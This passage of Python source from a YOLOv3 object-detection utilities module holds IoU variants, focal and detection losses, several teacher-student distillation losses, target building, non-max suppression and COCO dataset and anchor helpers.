# Returns the IoU of box1 to box2. box1 is 4, box2 is nx4
box2 = box2.t()
# Get the coordinates of bounding boxes
if x1y1x2y2: # x1, y1, x2, y2 = box1
b1_x1, b1_y1, b1_x2, b1_y2 = box1[0], box1[1], box1[2], box1[3]
b2_x1, b2_y1, b2_x2, b2_y2 = box2[0], box2[1], box2[2], box2[3]
else: # transform from xywh to xyxy
b1_x1, b1_x2 = box1[0] - box1[2] / 2, box1[0] + box1[2] / 2
b1_y1, b1_y2 = box1[1] - box1[3] / 2, box1[1] + box1[3] / 2
b2_x1, b2_x2 = box2[0] - box2[2] / 2, box2[0] + box2[2] / 2
b2_y1, b2_y2 = box2[1] - box2[3] / 2, box2[1] + box2[3] / 2
# Intersection area
inter = (torch.min(b1_x2, b2_x2) - torch.max(b1_x1, b2_x1)).clamp(0) * \
(torch.min(b1_y2, b2_y2) - torch.max(b1_y1, b2_y1)).clamp(0)
# Union Area
w1, h1 = b1_x2 - b1_x1, b1_y2 - b1_y1
w2, h2 = b2_x2 - b2_x1, b2_y2 - b2_y1
union = (w1 * h1 + 1e-16) + w2 * h2 - inter
iou = inter / union # iou
if GIoU or DIoU or CIoU:
cw = torch.max(b1_x2, b2_x2) - torch.min(b1_x1, b2_x1) # convex (smallest enclosing box) width
ch = torch.max(b1_y2, b2_y2) - torch.min(b1_y1, b2_y1) # convex height
if GIoU: # Generalized IoU https://arxiv.org/pdf/1902.09630.pdf
c_area = cw * ch + 1e-16 # convex area
return iou - (c_area - union) / c_area # GIoU
if DIoU or CIoU: # Distance or Complete IoU https://arxiv.org/abs/1911.08287v1
# convex diagonal squared
c2 = cw ** 2 + ch ** 2 + 1e-16
# centerpoint distance squared
rho2 = ((b2_x1 + b2_x2) - (b1_x1 + b1_x2)) ** 2 / 4 + ((b2_y1 + b2_y2) - (b1_y1 + b1_y2)) ** 2 / 4
if DIoU:
return iou - rho2 / c2 # DIoU
elif CIoU: # https://github.com/Zzh-tju/DIoU-SSD-pytorch/blob/master/utils/box/box_utils.py#L47
v = (4 / math.pi ** 2) * torch.pow(torch.atan(w2 / h2) - torch.atan(w1 / h1), 2)
with torch.no_grad():
alpha = v / (1 - iou + v)
return iou - (rho2 / c2 + v * alpha) # CIoU
return iou
def box_iou(box1, box2):
# https://github.com/pytorch/vision/blob/master/torchvision/ops/boxes.py
"""
Return intersection-over-union (Jaccard index) of boxes.
Both sets of boxes are expected to be in (x1, y1, x2, y2) format.
Arguments:
box1 (Tensor[N, 4])
box2 (Tensor[M, 4])
Returns:
iou (Tensor[N, M]): the NxM matrix containing the pairwise
IoU values for every element in boxes1 and boxes2
"""
def box_area(box):
# box = 4xn
return (box[2] - box[0]) * (box[3] - box[1])
area1 = box_area(box1.t())
area2 = box_area(box2.t())
# inter(N,M) = (rb(N,M,2) - lt(N,M,2)).clamp(0).prod(2)
inter = (torch.min(box1[:, None, 2:], box2[:, 2:]) - torch.max(box1[:, None, :2], box2[:, :2])).clamp(0).prod(2)
return inter / (area1[:, None] + area2 - inter) # iou = inter / (area1 + area2 - inter)
def wh_iou(wh1, wh2):
# Returns the nxm IoU matrix. wh1 is nx2, wh2 is mx2
wh1 = wh1[:, None] # [N,1,2]
wh2 = wh2[None] # [1,M,2]
inter = torch.min(wh1, wh2).prod(2) # [N,M]
return inter / (wh1.prod(2) + wh2.prod(2) - inter) # iou = inter / (area1 + area2 - inter)
class FocalLoss(nn.Module):
# Wraps focal loss around existing loss_fcn(), i.e. criteria = FocalLoss(nn.BCEWithLogitsLoss(), gamma=1.5)
def __init__(self, loss_fcn, gamma=1.5, alpha=0.25):
super(FocalLoss, self).__init__()
self.loss_fcn = loss_fcn # must be nn.BCEWithLogitsLoss()
self.gamma = gamma
self.alpha = alpha
self.reduction = loss_fcn.reduction
self.loss_fcn.reduction = 'none' # required to apply FL to each element
def forward(self, pred, true):
loss = self.loss_fcn(pred, true)
# p_t = torch.exp(-loss)
# loss *= self.alpha * (1.000001 - p_t) ** self.gamma # non-zero power for gradient stability
# TF implementation https://github.com/tensorflow/addons/blob/v0.7.1/tensorflow_addons/losses/focal_loss.py
pred_prob = torch.sigmoid(pred) # prob from logits
p_t = true * pred_prob + (1 - true) * (1 - pred_prob)
alpha_factor = true * self.alpha + (1 - true) * (1 - self.alpha)
modulating_factor = (1.0 - p_t) ** self.gamma
loss *= alpha_factor * modulating_factor
if self.reduction == 'mean':
return loss.mean()
elif self.reduction == 'sum':
return loss.sum()
else: # 'none'
return loss
def smooth_BCE(eps=0.1): # https://github.com/ultralytics/yolov3/issues/238#issuecomment-598028441
# return positive, negative label smoothing BCE targets
return 1.0 - 0.5 * eps, 0.5 * eps
def compute_loss(p, targets, model): # predictions, targets, model
ft = torch.cuda.FloatTensor if p[0].is_cuda else torch.Tensor
lcls, lbox, lobj = ft([0]), ft([0]), ft([0])
tcls, tbox, indices, anchor_vec = build_targets(p, targets, model)
h = model.hyp # hyperparameters
red = 'mean' # Loss reduction (sum or mean)
# Define criteria
BCEcls = nn.BCEWithLogitsLoss(pos_weight=ft([h['cls_pw']]), reduction=red)
BCEobj = nn.BCEWithLogitsLoss(pos_weight=ft([h['obj_pw']]), reduction=red)
# class label smoothing https://arxiv.org/pdf/1902.04103.pdf eqn 3
cp, cn = smooth_BCE(eps=0.0)
# focal loss
g = h['fl_gamma'] # focal loss gamma
if g > 0:
BCEcls, BCEobj = FocalLoss(BCEcls, g), FocalLoss(BCEobj, g)
# Compute losses
np, ng = 0, 0 # number grid points, targets
for i, pi in enumerate(p): # layer index, layer predictions
b, a, gj, gi = indices[i] # image, anchor, gridy, gridx
tobj = torch.zeros_like(pi[..., 0]) # target obj
np += tobj.numel()
# Compute losses
nb = len(b)
if nb: # number of targets
ng += nb
ps = pi[b, a, gj, gi] # prediction subset corresponding to targets
# ps[:, 2:4] = torch.sigmoid(ps[:, 2:4]) # wh power loss (uncomment)
# GIoU
pxy = torch.sigmoid(ps[:, 0:2]) # pxy = pxy * s - (s - 1) / 2, s = 1.5 (scale_xy)
pwh = torch.exp(ps[:, 2:4]).clamp(max=1E3) * anchor_vec[i]
pbox = torch.cat((pxy, pwh), 1) # predicted box
giou = bbox_iou(pbox.t(), tbox[i], x1y1x2y2=False, GIoU=True) # giou computation
lbox += (1.0 - giou).sum() if red == 'sum' else (1.0 - giou).mean() # giou loss
tobj[b, a, gj, gi] = (1.0 - model.gr) + model.gr * giou.detach().clamp(0).type(tobj.dtype) # giou ratio
if model.nc > 1: # cls loss (only if multiple classes)
t = torch.full_like(ps[:, 5:], cn) # targets
t[range(nb), tcls[i]] = cp
lcls += BCEcls(ps[:, 5:], t) # BCE
# lcls += CE(ps[:, 5:], tcls[i]) # CE
# Append targets to text file
# with open('targets.txt', 'a') as file:
# [file.write('%11.5g ' * 4 % tuple(x) + '\n') for x in torch.cat((txy[i], twh[i]), 1)]
lobj += BCEobj(pi[..., 4], tobj) # obj loss
lbox *= h['giou']
lobj *= h['obj']
lcls *= h['cls']
if red == 'sum':
bs = tobj.shape[0] # batch size
lobj *= 3 / (6300 * bs) * 2 # 3 / np * 2
if ng:
lcls *= 3 / ng / model.nc
lbox *= 3 / ng
loss = lbox + lobj + lcls
return loss, torch.cat((lbox, lobj, lcls, loss)).detach()
def compute_lost_KD(output_s, output_t, num_classes, batch_size):
T = 3.0
Lambda_ST = 0.001
criterion_st = torch.nn.KLDivLoss(reduction='sum')
output_s = torch.cat([i.view(-1, num_classes + 5) for i in output_s])
output_t = torch.cat([i.view(-1, num_classes + 5) for i in output_t])
loss_st = criterion_st(nn.functional.log_softmax(output_s / T, dim=1),
nn.functional.softmax(output_t / T, dim=1)) * (T * T) / batch_size
return loss_st * Lambda_ST
def compute_lost_KD2(model, targets, output_s, output_t):
reg_m = 0.0
T = 3.0
Lambda_cls, Lambda_box = 0.0001, 0.001
criterion_st = torch.nn.KLDivLoss(reduction='sum')
ft = torch.cuda.FloatTensor if output_s[0].is_cuda else torch.Tensor
lcls, lbox = ft([0]), ft([0])
tcls, tbox, indices, anchor_vec = build_targets(output_s, targets, model)
reg_ratio, reg_num, reg_nb = 0, 0, 0
for i, (ps, pt) in enumerate(zip(output_s, output_t)): # layer index, layer predictions
b, a, gj, gi = indices[i] # image, anchor, gridy, gridx
nb = len(b)
if nb: # number of targets
pss = ps[b, a, gj, gi] # prediction subset corresponding to targets
pts = pt[b, a, gj, gi]
psxy = torch.sigmoid(pss[:, 0:2]) # pxy = pxy * s - (s - 1) / 2, s = 1.5 (scale_xy)
psbox = torch.cat((psxy, torch.exp(pss[:, 2:4]) * anchor_vec[i]), 1).view(-1, 4) # predicted box
ptxy = torch.sigmoid(pts[:, 0:2]) # pxy = pxy * s - (s - 1) / 2, s = 1.5 (scale_xy)
ptbox = torch.cat((ptxy, torch.exp(pts[:, 2:4]) * anchor_vec[i]), 1).view(-1, 4) # predicted box
l2_dis_s = (psbox - tbox[i]).pow(2).sum(1)
l2_dis_s_m = l2_dis_s + reg_m
l2_dis_t = (ptbox - tbox[i]).pow(2).sum(1)
l2_num = l2_dis_s_m > l2_dis_t
lbox += l2_dis_s[l2_num].sum()
reg_num += l2_num.sum().item()
reg_nb += nb
output_s_i = ps[..., 4:].view(-1, model.nc + 1)
output_t_i = pt[..., 4:].view(-1, model.nc + 1)
lcls += criterion_st(nn.functional.log_softmax(output_s_i / T, dim=1),
nn.functional.softmax(output_t_i / T, dim=1)) * (T * T) / ps.size(0)
if reg_nb:
reg_ratio = reg_num / reg_nb
return lcls * Lambda_cls + lbox * Lambda_box, reg_ratio
def compute_lost_KD3(model, targets, output_s, output_t):
T = 3.0
Lambda_cls, Lambda_box = 0.0001, 0.001
criterion_st = torch.nn.KLDivLoss(reduction='sum')
ft = torch.cuda.FloatTensor if output_s[0].is_cuda else torch.Tensor
lcls, lbox = ft([0]), ft([0])
tcls, tbox, indices, anchor_vec = build_targets(output_s, targets, model)
for i, (ps, pt) in enumerate(zip(output_s, output_t)): # layer index, layer predictions
b, a, gj, gi = indices[i] # image, anchor, gridy, gridx
nb = len(b)
if nb: # number of targets
pss = ps[b, a, gj, gi] # prediction subset corresponding to targets
pts = pt[b, a, gj, gi]
psxy = torch.sigmoid(pss[:, 0:2]) # pxy = pxy * s - (s - 1) / 2, s = 1.5 (scale_xy)
psbox = torch.cat((psxy, torch.exp(pss[:, 2:4]) * anchor_vec[i]), 1).view(-1, 4) # predicted box
ptxy = torch.sigmoid(pts[:, 0:2]) # pxy = pxy * s - (s - 1) / 2, s = 1.5 (scale_xy)
ptbox = torch.cat((ptxy, torch.exp(pts[:, 2:4]) * anchor_vec[i]), 1).view(-1, 4) # predicted box
l2_dis = (psbox - ptbox).pow(2).sum(1)
lbox += l2_dis.sum()
output_s_i = ps[..., 4:].view(-1, model.nc + 1)
output_t_i = pt[..., 4:].view(-1, model.nc + 1)
lcls += criterion_st(nn.functional.log_softmax(output_s_i / T, dim=1),
nn.functional.softmax(output_t_i / T, dim=1)) * (T * T) / ps.size(0)
return lcls * Lambda_cls + lbox * Lambda_box
def compute_lost_KD4(model, targets, output_s, output_t, feature_s, feature_t, batch_size):
T = 3.0
Lambda_cls, Lambda_box, Lambda_feature = 0.0001, 0.001, 0.001
criterion_st = torch.nn.KLDivLoss(reduction='sum')
criterion_stf = torch.nn.KLDivLoss(reduction='mean')
ft = torch.cuda.FloatTensor if output_s[0].is_cuda else torch.Tensor
lcls, lbox, lfeature = ft([0]), ft([0]), ft([0])
tcls, tbox, indices, anchor_vec = build_targets(output_s, targets, model)
for i, (ps, pt) in enumerate(zip(output_s, output_t)): # layer index, layer predictions
b, a, gj, gi = indices[i] # image, anchor, gridy, gridx
nb = len(b)
if nb: # number of targets
pss = ps[b, a, gj, gi] # prediction subset corresponding to targets
pts = pt[b, a, gj, gi]
psxy = torch.sigmoid(pss[:, 0:2]) # pxy = pxy * s - (s - 1) / 2, s = 1.5 (scale_xy)
psbox = torch.cat((psxy, torch.exp(pss[:, 2:4]) * anchor_vec[i]), 1).view(-1, 4) # predicted box
ptxy = torch.sigmoid(pts[:, 0:2]) # pxy = pxy * s - (s - 1) / 2, s = 1.5 (scale_xy)
ptbox = torch.cat((ptxy, torch.exp(pts[:, 2:4]) * anchor_vec[i]), 1).view(-1, 4) # predicted box
l2_dis = (psbox - ptbox).pow(2).sum(1)
lbox += l2_dis.sum()
# cls loss
output_s_i = ps[..., 4:].view(-1, model.nc + 1)
output_t_i = pt[..., 4:].view(-1, model.nc + 1)
lcls += criterion_st(nn.functional.log_softmax(output_s_i / T, dim=1),
nn.functional.softmax(output_t_i / T, dim=1)) * (T * T) / ps.size(0)
# feature loss
if len(feature_t) != len(feature_s):
print("feature mismatch!")
exit()
for i in range(len(feature_t)):
# feature_t[i] = feature_t[i].pow(2).sum(1)
feature_t[i] = feature_t[i].abs().sum(1)
# feature_s[i] = feature_s[i].pow(2).sum(1)
feature_s[i] = feature_s[i].abs().sum(1)
lfeature += criterion_stf(nn.functional.log_softmax(feature_s[i] / T),
nn.functional.softmax(feature_t[i] / T)) * (T * T) / batch_size
return lcls * Lambda_cls + lbox * Lambda_box + lfeature * Lambda_feature
def indices_merge(indices):
indices_merge = []
for i in range(len(indices)):
temp = list(indices[i])
temp[2] = temp[2] * (2 ** (5 - i))
temp[3] = temp[3] * (2 ** (5 - i))
indices_merge.append(temp)
return indices_merge
def fine_grained_imitation_feature_mask(feature_s, feature_t, indices, img_size):
if feature_t.size() != feature_s.size():
print("feature mismatch!")
exit()
B, Gj, Gi = torch.Tensor(0).long().cuda(), torch.Tensor(0).long().cuda(), torch.Tensor(0).long().cuda()
feature_size = feature_s.size()[1]
scale = img_size / feature_size
for j in range(len(indices)):
if 2 ** (5 - j) < scale:
break
b, _, gj, gi = indices[j] # image, gridy, gridx
gj, gi = (gj / scale).long(), (gi / scale).long()
for i in range(gj.size()[0]):
if 2 ** (5 - j) == scale:
break
b_temp = (torch.ones(int(2 ** (5 - j) / scale - 1)) * b[i]).long().cuda()
gj_temp = torch.arange(int(gj[i].item()) + 1, int(gj[i].item() + 2 ** (5 - j) / scale)).cuda()
gi_temp = torch.arange(int(gi[i].item()) + 1, int(gi[i].item() + 2 ** (5 - j) / scale)).cuda()
b = torch.cat((b, b_temp))
gj = torch.cat((gj, gj_temp))
gi = torch.cat((gi, gi_temp))
B = torch.cat((B, b))
Gj = torch.cat((Gj, gj))
Gi = torch.cat((Gi, gi))
mask = torch.zeros(feature_s.size())
mask[B, Gj, Gi] = 1
return mask
def compute_lost_KD5(model, targets, output_s, output_t, feature_s, feature_t, batch_size, img_size):
T = 3.0
Lambda_cls, Lambda_box, Lambda_feature = 0.1, 0.001, 0.1
criterion_st = torch.nn.KLDivLoss(reduction='mean')
ft = torch.cuda.FloatTensor if output_s[0].is_cuda else torch.Tensor
lcls, lbox, lfeature = ft([0]), ft([0]), ft([0])
tcls, tbox, indices, anchor_vec = build_targets(output_s, targets, model)
for i, (ps, pt) in enumerate(zip(output_s, output_t)): # layer index, layer predictions
b, a, gj, gi = indices[i] # image, anchor, gridy, gridx
nb = len(b)
if nb: # number of targets
pss = ps[b, a, gj, gi] # prediction subset corresponding to targets
pts = pt[b, a, gj, gi]
psxy = torch.sigmoid(pss[:, 0:2]) # pxy = pxy * s - (s - 1) / 2, s = 1.5 (scale_xy)
psbox = torch.cat((psxy, torch.exp(pss[:, 2:4]) * anchor_vec[i]), 1).view(-1, 4) # predicted box
ptxy = torch.sigmoid(pts[:, 0:2]) # pxy = pxy * s - (s - 1) / 2, s = 1.5 (scale_xy)
ptbox = torch.cat((ptxy, torch.exp(pts[:, 2:4]) * anchor_vec[i]), 1).view(-1, 4) # predicted box
l2_dis = (psbox - ptbox).pow(2).sum(1)
lbox += l2_dis.sum()
# cls loss
output_s_i = ps[..., 4:].view(-1, model.nc + 1)
output_t_i = pt[..., 4:].view(-1, model.nc + 1)
lcls += criterion_st(nn.functional.log_softmax(output_s_i / T, dim=1),
nn.functional.softmax(output_t_i / T, dim=1)) * (T * T) / ps.size(0)
# feature loss
if len(feature_t) != len(feature_s):
print("feature mismatch!")
exit()
merge = indices_merge(indices)
for i in range(len(feature_t)):
# feature_t[i] = feature_t[i].pow(2).sum(1)
feature_t[i] = feature_t[i].abs().sum(1)
# feature_s[i] = feature_s[i].pow(2).sum(1)
feature_s[i] = feature_s[i].abs().sum(1)
mask = fine_grained_imitation_feature_mask(feature_s[i], feature_t[i], merge, img_size)
mask = mask.to(targets.device)
feature_t[i] = (feature_t[i] * mask).view(batch_size, -1)
feature_s[i] = (feature_s[i] * mask).view(batch_size, -1)
lfeature += criterion_st(nn.functional.log_softmax(feature_s[i] / T, dim=1),
nn.functional.softmax(feature_t[i] / T, dim=1)) * (T * T) / batch_size
# print(lcls.data)
# print(lbox.data)
# print(lfeature.data)
return lcls * Lambda_cls + lbox * Lambda_box + lfeature * Lambda_feature
def fine_grained_imitation_mask(feature_s, feature_t, indices):
if len(feature_t) != len(feature_s):
print("feature mismatch!")
exit()
mask = []
for i in range(len(feature_t)):
temp = torch.zeros(feature_s[i].size())
b, a, gj, gi = indices[i] # image, anchor, gridy, gridx
temp[b, a, gj, gi] = 1
mask.append(temp)
return mask
# FineGrainedmask
def compute_lost_KD6(model, targets, output_s, output_t, batch_size):
T = 3.0
Lambda_feature = 0.001
criterion_st = torch.nn.KLDivLoss(reduction='sum')
feature_s = list(output_s)
feature_t = list(output_t)
tcls, tbox, indices, anchor_vec = build_targets(output_s, targets, model)
mask = fine_grained_imitation_mask(feature_s, feature_t, indices)
test = indices_merge(indices)
# feature loss
for i in range(len(mask)):
mask[i] = mask[i].to(targets.device)
feature_t[i] = feature_t[i] * mask[i]
feature_s[i] = feature_s[i] * mask[i]
feature_s = torch.cat([i.view(-1, 3 * (model.nc + 5)) for i in feature_s])
feature_t = torch.cat([i.view(-1, 3 * (model.nc + 5)) for i in feature_t])
lfeature = criterion_st(nn.functional.log_softmax(feature_s / T, dim=1),
nn.functional.softmax(feature_t / T, dim=1)) * (T * T) / batch_size
return lfeature * Lambda_feature
def build_targets(p, targets, model):
# targets = [image, class, x, y, w, h]
nt = targets.shape[0]
tcls, tbox, indices, av = [], [], [], []
reject, use_all_anchors = True, True
gain = torch.ones(6, device=targets.device) # normalized to gridspace gain
# m = list(model.modules())[-1]
# for i in range(m.nl):
# anchors = m.anchors[i]
multi_gpu = type(model) in (nn.parallel.DataParallel, nn.parallel.DistributedDataParallel)
for i, j in enumerate(model.yolo_layers):
# get number of grid points and anchor vec for this yolo layer
anchors = model.module.module_list[j].anchor_vec if multi_gpu else model.module_list[j].anchor_vec
# iou of targets-anchors
gain[2:] = torch.tensor(p[i].shape)[[3, 2, 3, 2]] # xyxy gain
t, a = targets * gain, []
gwh = t[:, 4:6]
if nt:
iou = wh_iou(anchors, gwh) # iou(3,n) = wh_iou(anchors(3,2), gwh(n,2))
if use_all_anchors:
na = anchors.shape[0] # number of anchors
a = torch.arange(na).view(-1, 1).repeat(1, nt).view(-1)
t = t.repeat(na, 1)
else: # use best anchor only
iou, a = iou.max(0) # best iou and anchor
# reject anchors below iou_thres (OPTIONAL, increases P, lowers R)
if reject:
j = iou.view(-1) > model.hyp['iou_t'] # iou threshold hyperparameter
t, a = t[j], a[j]
# Indices
b, c = t[:, :2].long().t() # target image, class
gxy = t[:, 2:4] # grid x, y
gwh = t[:, 4:6] # grid w, h
gi, gj = gxy.long().t() # grid x, y indices
indices.append((b, a, gj, gi))
# Box
gxy -= gxy.floor() # xy
tbox.append(torch.cat((gxy, gwh), 1)) # xywh (grids)
av.append(anchors[a]) # anchor vec
# Class
tcls.append(c)
if c.shape[0]: # if any targets
assert c.max() < model.nc, 'Model accepts %g classes labeled from 0-%g, however you labelled a class %g. ' \
'See https://github.com/ultralytics/yolov3/wiki/Train-Custom-Data' % (
model.nc, model.nc - 1, c.max())
return tcls, tbox, indices, av
def non_max_suppression(prediction, conf_thres=0.1, iou_thres=0.6, multi_label=True, classes=None, agnostic=False):
"""
Performs Non-Maximum Suppression on inference results
Returns detections with shape:
nx6 (x1, y1, x2, y2, conf, cls)
"""
# Box constraints
min_wh, max_wh = 2, 4096 # (pixels) minimum and maximum box width and height
method = 'merge'
nc = prediction[0].shape[1] - 5 # number of classes
multi_label &= nc > 1 # multiple labels per box
output = [None] * len(prediction)
for xi, x in enumerate(prediction): # image index, image inference
# Apply conf constraint
x = x[x[:, 4] > conf_thres]
# Apply width-height constraint
x = x[((x[:, 2:4] > min_wh) & (x[:, 2:4] < max_wh)).all(1)]
# If none remain process next image
if not x.shape[0]:
continue
# Compute conf
x[..., 5:] *= x[..., 4:5] # conf = obj_conf * cls_conf
# Box (center x, center y, width, height) to (x1, y1, x2, y2)
box = xywh2xyxy(x[:, :4])
# Detections matrix nx6 (xyxy, conf, cls)
if multi_label:
i, j = (x[:, 5:] > conf_thres).nonzero().t()
x = torch.cat((box[i], x[i, j + 5].unsqueeze(1), j.float().unsqueeze(1)), 1)
else: # best class only
conf, j = x[:, 5:].max(1)
x = torch.cat((box, conf.unsqueeze(1), j.float().unsqueeze(1)), 1)
# Filter by class
if classes:
x = x[(j.view(-1, 1) == torch.tensor(classes, device=j.device)).any(1)]
# Apply finite constraint
if not torch.isfinite(x).all():
x = x[torch.isfinite(x).all(1)]
# If none remain process next image
n = x.shape[0] # number of boxes
if not n:
continue
# Sort by confidence
# if method == 'fast_batch':
# x = x[x[:, 4].argsort(descending=True)]
# Batched NMS
c = x[:, 5] * 0 if agnostic else x[:, 5] # classes
boxes, scores = x[:, :4].clone() + c.view(-1, 1) * max_wh, x[:, 4] # boxes (offset by class), scores
if method == 'merge': # Merge NMS (boxes merged using weighted mean)
i = torchvision.ops.boxes.nms(boxes, scores, iou_thres)
if 1 < n < 3E3: # update boxes as boxes(i,4) = weights(i,n) * boxes(n,4)
try:
# weights = (box_iou(boxes, boxes).tril_() > iou_thres) * scores.view(-1, 1) # box weights
# weights /= weights.sum(0) # normalize
# x[:, :4] = torch.mm(weights.T, x[:, :4])
weights = (box_iou(boxes[i], boxes) > iou_thres) * scores[None] # box weights
x[i, :4] = torch.mm(weights, x[:, :4]).float() / weights.sum(1, keepdim=True) # merged boxes
except: # possible CUDA error https://github.com/ultralytics/yolov3/issues/1139
pass
elif method == 'vision':
i = torchvision.ops.boxes.nms(boxes, scores, iou_thres)
elif method == 'fast': # FastNMS from https://github.com/dbolya/yolact
iou = box_iou(boxes, boxes).triu_(diagonal=1) # upper triangular iou matrix
i = iou.max(0)[0] < iou_thres
output[xi] = x[i]
return output
def get_yolo_layers(model):
bool_vec = [x['type'] == 'yolo' for x in model.module_defs]
return [i for i, x in enumerate(bool_vec) if x] # [82, 94, 106] for yolov3
def print_model_biases(model):
# prints the bias neurons preceding each yolo layer
print('\nModel Bias Summary: %8s%18s%18s%18s' % ('layer', 'regression', 'objectness', 'classification'))
try:
multi_gpu = type(model) in (nn.parallel.DataParallel, nn.parallel.DistributedDataParallel)
for l in model.yolo_layers: # print pretrained biases
if multi_gpu:
na = model.module.module_list[l].na # number of anchors
b = model.module.module_list[l - 1][0].bias.view(na, -1) # bias 3x85
else:
na = model.module_list[l].na
b = model.module_list[l - 1][0].bias.view(na, -1) # bias 3x85
print(' ' * 20 + '%8g %18s%18s%18s' % (l, '%5.2f+/-%-5.2f' % (b[:, :4].mean(), b[:, :4].std()),
'%5.2f+/-%-5.2f' % (b[:, 4].mean(), b[:, 4].std()),
'%5.2f+/-%-5.2f' % (b[:, 5:].mean(), b[:, 5:].std())))
except:
pass
def strip_optimizer(f='weights/last.pt'): # from utils.utils import *; strip_optimizer()
# Strip optimizer from *.pt files for lighter files (reduced by 2/3 size)
x = torch.load(f, map_location=torch.device('cpu'))
x['optimizer'] = None
torch.save(x, f)
def create_backbone(f='weights/last.pt'): # from utils.utils import *; create_backbone()
# create a backbone from a *.pt file
x = torch.load(f, map_location=torch.device('cpu'))
x['optimizer'] = None
x['training_results'] = None
x['epoch'] = -1
for p in x['model'].values():
try:
p.requires_grad = True
except:
pass
torch.save(x, 'weights/backbone.pt')
def coco_class_count(path='../coco/labels/train2014/'):
# Histogram of occurrences per class
nc = 80 # number classes
x = np.zeros(nc, dtype='int32')
files = sorted(glob.glob('%s/*.*' % path))
for i, file in enumerate(files):
labels = np.loadtxt(file, dtype=np.float32).reshape(-1, 5)
x += np.bincount(labels[:, 0].astype('int32'), minlength=nc)
print(i, len(files))
def coco_only_people(path='../coco/labels/train2017/'): # from utils.utils import *; coco_only_people()
# Find images with only people
files = sorted(glob.glob('%s/*.*' % path))
for i, file in enumerate(files):
labels = np.loadtxt(file, dtype=np.float32).reshape(-1, 5)
if all(labels[:, 0] == 0):
print(labels.shape[0], file)
def select_best_evolve(path='evolve*.txt'): # from utils.utils import *; select_best_evolve()
# Find best evolved mutation
for file in sorted(glob.glob(path)):
x = np.loadtxt(file, dtype=np.float32, ndmin=2)
print(file, x[fitness(x).argmax()])
def crop_images_random(path='../images/', scale=0.50): # from utils.utils import *; crop_images_random()
# crops images into random squares up to scale fraction
# WARNING: overwrites images!
for file in tqdm(sorted(glob.glob('%s/*.*' % path))):
img = cv2.imread(file) # BGR
if img is not None:
h, w = img.shape[:2]
# create random mask
a = 30 # minimum size (pixels)
mask_h = random.randint(a, int(max(a, h * scale))) # mask height
mask_w = mask_h # mask width
# box
xmin = max(0, random.randint(0, w) - mask_w // 2)
ymin = max(0, random.randint(0, h) - mask_h // 2)
xmax = min(w, xmin + mask_w)
ymax = min(h, ymin + mask_h)
# apply random color mask
cv2.imwrite(file, img[ymin:ymax, xmin:xmax])
def coco_single_class_labels(path='../coco/labels/train2014/', label_class=43):
# Makes single-class coco datasets. from utils.utils import *; coco_single_class_labels()
if os.path.exists('new/'):
shutil.rmtree('new/') # delete output folder
os.makedirs('new/') # make new output folder
os.makedirs('new/labels/')
os.makedirs('new/images/')
for file in tqdm(sorted(glob.glob('%s/*.*' % path))):
with open(file, 'r') as f:
labels = np.array([x.split() for x in f.read().splitlines()], dtype=np.float32)
i = labels[:, 0] == label_class
if any(i):
img_file = file.replace('labels', 'images').replace('txt', 'jpg')
labels[:, 0] = 0 # reset class to 0
with open('new/images.txt', 'a') as f: # add image to dataset list
f.write(img_file + '\n')
with open('new/labels/' + Path(file).name, 'a') as f: # write label
for l in labels[i]:
f.write('%g %.6f %.6f %.6f %.6f\n' % tuple(l))
shutil.copyfile(src=img_file, dst='new/images/' + Path(file).name.replace('txt', 'jpg')) # copy images
def kmean_anchors(path='./data/coco64.txt', n=9, img_size=(320, 1024), thr=0.20, gen=1000):
# Creates kmeans anchors for use in *.cfg files: from utils.utils import *; _ = kmean_anchors()
# n: number of anchors
# img_size: (min, max) image size used for multi-scale training (can be same values)
# thr: IoU threshold hyperparameter used for training (0.0 - 1.0)
# gen: generations to evolve anchors using genetic algorithm
from utils.datasets import LoadImagesAndLabels
def print_results(k):
k = k[np.argsort(k.prod(1))] # sort small to large
iou = wh_iou(wh, torch.Tensor(k))
max_iou = iou.max(1)[0]
bpr, aat = (max_iou > thr).float().mean(), (iou > thr).float().mean() * n # best possible recall, anch > thr
print('%.2f iou_thr: %.3f best possible recall, %.2f anchors > thr' % (thr, bpr, aat))
print('n=%g, img_size=%s, IoU_all=%.3f/%.3f-mean/best, IoU>thr=%.3f-mean: ' %
(n, img_size, iou.mean(), max_iou.mean(), iou[iou > thr].mean()), end='')
for i, x in enumerate(k):
print('%i,%i' % (round(x[0]), round(x[1])), end=', ' if i < len(k) - 1 else '\n') # use in *.cfg
return k
def fitness(k): # mutation fitness
iou = wh_iou(wh, torch.Tensor(k)) # iou
max_iou = iou.max(1)[0]
return (max_iou * (max_iou > thr).float()).mean() # product
# Get label wh
wh = []
dataset = LoadImagesAndLabels(path, augment=True, rect=True)
nr = 1 if img_size[0] == img_size[1] else 10 # number augmentation repetitions
for s, l in zip(dataset.shapes, dataset.labels):
wh.append(l[:, 3:5] * (s / s.max())) # image normalized to letterbox normalized wh
wh = np.concatenate(wh, 0).repeat(nr, axis=0) # augment 10x
wh *= np.random.uniform(img_size[0], img_size[1], size=(wh.shape[0], 1)) # normalized to pixels (multi-scale)
wh = wh[(wh > 2.0).all(1)] # remove below threshold boxes (< 2 pixels wh)
# Darknet yolov3.cfg anchors
use_darknet = False
if use_darknet and n == 9:
k = np.array([[10, 13], [16, 30], [33, 23], [30, 61], [62, 45], [59, 119], [116, 90], [156, 198], [373, 326]])
else:
# Kmeans calculation
from scipy.cluster.vq import kmeans
print('Running kmeans for %g anchors on %g points...' % (n, len(wh)))
s = wh.std(0) # sigmas for whitening
k, dist = kmeans(wh / s, n, iter=30) # points, mean distance
k *= s
wh = torch.Tensor(wh)
k = print_results(k)
# # Plot
# k, d = [None] * 20, [None] * 20
# for i in tqdm(range(1, 21)):
# k[i-1], d[i-1] = kmeans(wh / s, i) # points, mean distance
# fig, ax = plt.subplots(1, 2, figsize=(14, 7))
# ax = ax.ravel()
# ax[0].plot(np.arange(1, 21), np.array(d) ** 2, marker='.')
# fig, ax = plt.subplots(1, 2, figsize=(14, 7)) # plot wh
# ax[0].hist(wh[wh[:, 0]<100, 0],400)
# ax[1].hist(wh[wh[:, 1]<100, 1],400)
# fig.tight_layout()
# fig.savefig('wh.png', dpi=200)
# Evolve
npr = np.random
f, sh, mp, s = fitness(k), k.shape, 0.9, 0.1 # fitness, generations, mutation prob, sigma
for _ in tqdm(range(gen), desc='Evolving anchors'):
v = np.ones(sh)
while (v == 1).all(): # mutate until a change occurs (prevent duplicates)
v = ((npr.random(sh) < mp) * npr.random() * npr.randn(*sh) * s + 1).clip(0.3, 3.0) # 98.6, 61.6
kg = (k.copy() * v).clip(min=2.0)
fg = fitness(kg)
if fg > f:
f, k = fg, kg.copy()
